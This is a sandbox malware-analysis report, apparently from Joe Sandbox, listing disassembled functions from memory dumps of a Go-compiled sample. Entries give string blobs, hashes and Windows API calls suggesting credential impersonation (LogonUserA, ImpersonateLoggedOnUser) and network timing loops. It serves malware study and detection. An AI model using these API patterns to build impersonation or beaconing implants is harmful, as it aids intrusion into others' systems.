runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr stopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->, xrefs: 008124E7

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: , goid=, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWSARecvWSASendtypes value=c$, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC mark terminationGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInformationHaiti Standar$invalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remotereflect mismatchremote I/O errorruntime: addr = runtime: base = runtime: head = runtime: nelems=schedule: in cgotime: bad [0-9]*work$runtime: gp: gp=runtime: getg: g=runtime: npages = runtime: range = {runtime: textAddr stopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->$suspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is already connectedaddress family not supported by protocolbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock
API String ID: 0-3338344930
Opcode ID: 55b46dc7c79358faad6d92f36fc8fdd71edb6c1cf7bdd7cdde7836d290b65b8b
Instruction ID: be037fc97bfdcc492449d7579ebed6a65d4b937829c788db9ed73c58639fdb38
Opcode Fuzzy Hash: 55b46dc7c79358faad6d92f36fc8fdd71edb6c1cf7bdd7cdde7836d290b65b8b
Instruction Fuzzy Hash: 68D17176208B84C6D710DF69F04179EBB65FB89B80F548166EF9D83B6ACB38C590CB41

Uniqueness

Uniqueness Score: -1.00%

Function 007FB460 Relevance: 6.4, Strings: 5, Instructions: 174COMMON

Download Yara Rule

Strings

(scan (scan) MB in allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalS, xrefs: 007FB677
->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST, xrefs: 007FB6B5
+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS, xrefs: 007FB6EF
pacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level], xrefs: 007FB657
MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep wait, xrefs: 007FB6D4

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: (scan (scan) MB in allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalS$ MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep wait$+./0:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCS$->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJST$pacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level]
API String ID: 0-4219942716
Opcode ID: 3731aeb355f6d02f8530660f39e1ce0047a7c256f7d32d13c5dd415e7dde3193
Instruction ID: 23b7687488844b159fe2961ca1c000171558c190a488770721d0775d57ad7715
Opcode Fuzzy Hash: 3731aeb355f6d02f8530660f39e1ce0047a7c256f7d32d13c5dd415e7dde3193
Instruction Fuzzy Hash: 367195A2618F88C5D712EF29E44035A67A9FB9ABC0F44C236EA8D57725CF3CC191C751

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73A7DC Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA73A564: CloseHandle.KERNEL32 ref: 0000017DEA73A574
Part of subcall function 0000017DEA73A564: RevertToSelf.ADVAPI32 ref: 0000017DEA73A582

LogonUserA.ADVAPI32 ref: 0000017DEA73A824
GetLastError.KERNEL32 ref: 0000017DEA73A82E

Part of subcall function 0000017DEA734720: malloc.LIBCMT ref: 0000017DEA73473C

Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA21
Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA49

Part of subcall function 0000017DEA73AA24: GetTokenInformation.ADVAPI32 ref: 0000017DEA73AAB9

ImpersonateLoggedOnUser.ADVAPI32 ref: 0000017DEA73A84C
GetLastError.KERNEL32 ref: 0000017DEA73A856

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWide$CloseHandleImpersonateInformationLoggedLogonRevertSelfTokenmalloc
String ID:
API String ID: 2370685222-0
Opcode ID: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
Instruction ID: ae71f365ae71eccc267b66d784d346ffde87f9b9035f7f8e4bc3447927837a19
Opcode Fuzzy Hash: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
Instruction Fuzzy Hash: 09315930718A4A81FB12FB52B8493F62B74AFC5BD4F640134D9DE4F7A6CE29C6858302

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA733F88 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA733FAF

Part of subcall function 0000017DEA72ED34: WSAStartup.WS2_32 ref: 0000017DEA72ED52

Sleep.KERNEL32 ref: 0000017DEA733FFE
GetTickCount.KERNEL32 ref: 0000017DEA734004
WSAGetLastError.WS2_32 ref: 0000017DEA73400E

Part of subcall function 0000017DEA734154: ioctlsocket.WS2_32 ref: 0000017DEA734176

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepStartupioctlsocket
String ID:
API String ID: 3100619841-0
Opcode ID: ad234fc6b16c71ade5ac4f0f39529c60848aa73fa2a8e9c9ef1101c36ac769b1
Instruction ID: bb47891754b87c58e4bc402f873ac4fadc2b137e44e3f1896e6738d8f9a0d0e8
Opcode Fuzzy Hash: ad234fc6b16c71ade5ac4f0f39529c60848aa73fa2a8e9c9ef1101c36ac769b1
Instruction Fuzzy Hash: D8318936704B4586EB12EBA2E4442EC33B5FBC8BE0F510625DEAD57795CE34C649C301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735D58 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 0000017DEA735D76
GetProcessHeap.KERNEL32 ref: 0000017DEA735D7C
HeapAlloc.KERNEL32 ref: 0000017DEA735D8C
InitializeProcThreadAttributeList.KERNEL32 ref: 0000017DEA735DA7

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: AttributeHeapInitializeListProcThread$AllocProcess
String ID:
API String ID: 1212816094-0
Opcode ID: 62263623e8ff9a03dfdac281dd069e3106b55080811b78c7820858d5affca705
Instruction ID: 816532388fab246a5a50f45eb2590321f1b3b29120c1a32fa13f5bf3cc1304a2
Opcode Fuzzy Hash: 62263623e8ff9a03dfdac281dd069e3106b55080811b78c7820858d5affca705
Instruction Fuzzy Hash: BBF02832339A4A42EB46DB25B4447EA52B1DFC8BE0F584435AA8F4B714CE38C1848600

Uniqueness

Uniqueness Score: -1.00%

Function 008187E0 Relevance: 5.7, Strings: 4, Instructions: 688COMMON

Download Yara Rule

Strings

findrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close , xrefs: 008192EF
findrunnable: wrong plink has been severednegative shift amountpackage not installedpanic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime:, xrefs: 00819327
findrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1, xrefs: 00819305
findrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exce, xrefs: 00819316

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: findrunnable: negative nmspinningfreeing stack not in a stack spanmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: castogscanstatus oldval=runtime: failed mSpanList.insert runtime: failed to decommit pagesruntime: goroutine stack exce$findrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1$findrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close $findrunnable: wrong plink has been severednegative shift amountpackage not installedpanic on system stackpreempt at unknown pcread-only file systemreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime:
API String ID: 0-2756945545
Opcode ID: 328f45c2c53fab168a338d721e957d546d902a712d2db8299f1bdfd4ea560a9d
Instruction ID: 3d9c8ad2f22a323351d0fe213e30d79ca5b05f70819411c053253de71e8349d7
Opcode Fuzzy Hash: 328f45c2c53fab168a338d721e957d546d902a712d2db8299f1bdfd4ea560a9d
Instruction Fuzzy Hash: 6A529E72209BC4C5DB249B15F4813EAB369FB85B84F489026DACD87B69DF7CC884CB41

Uniqueness

Uniqueness Score: -1.00%

Function 007E4200 Relevance: 5.4, Strings: 4, Instructions: 381COMMON

Download Yara Rule

Strings

unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<, xrefs: 007E42FB
G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 007E47E6
chansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: , xrefs: 007E47C2
`X~, xrefs: 007E460E

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: len out of rangeinternal lockOSThread errorinvalid profile b$`X~$chansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: $unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<
API String ID: 0-739199441
Opcode ID: fe97707c45efa845487b5edf018fd62c5290b466d7aac1977549a1606f4410ff
Instruction ID: 3e4655bf5592b5fb5cf032a876442143d619526dce87f0ca64ebf24f45243837
Opcode Fuzzy Hash: fe97707c45efa845487b5edf018fd62c5290b466d7aac1977549a1606f4410ff
Instruction Fuzzy Hash: C1F1DE72209BC0C6DB10DB26E44039AB7A1F78ABE4F549225DB9C57BA9CF3CC494DB41

Uniqueness

Uniqueness Score: -1.00%

Function 007F4780 Relevance: 5.3, Strings: 4, Instructions: 333COMMON

Download Yara Rule

Strings

flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException , xrefs: 007F4CA5
!= sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileW, xrefs: 007F4CC5
p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun, xrefs: 007F4CEA
runtime: p scheddetailsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s, xrefs: 007F4C86

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileW$ flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException $p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubsemaRoot rotateRighttime: invalid numbertrace: out of memorywirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCoun$runtime: p scheddetailsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s
API String ID: 0-3565077920
Opcode ID: 4b2ef6fee09eb877f9d0f1b64e5bc12bc2f8aa7c144caa8662d473ba8553257f
Instruction ID: d3bf03264c577d34892c142ee1a81f9cfb3dfd79ad9db71e5e3f6328a895f2ed
Opcode Fuzzy Hash: 4b2ef6fee09eb877f9d0f1b64e5bc12bc2f8aa7c144caa8662d473ba8553257f
Instruction Fuzzy Hash: 38E19F76209B84C7DB00DF24E48136AB761F7897A0F559226EBAD83BA5DF7DC484CB00

Uniqueness

Uniqueness Score: -1.00%

Function 008159E0 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin, xrefs: 00815DEF
runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNorth Asia East Standard Timead, xrefs: 00815DAD
casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex, xrefs: 00815D65
newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_, xrefs: 00815DC8

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_$casgstatus: bad incoming valuescheckmark found unmarked objectentersyscallblock inconsistent internal error - misuse of itabmalformed time zone informationnon in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorresetspinnin$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characterpanicwrap: unex$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNorth 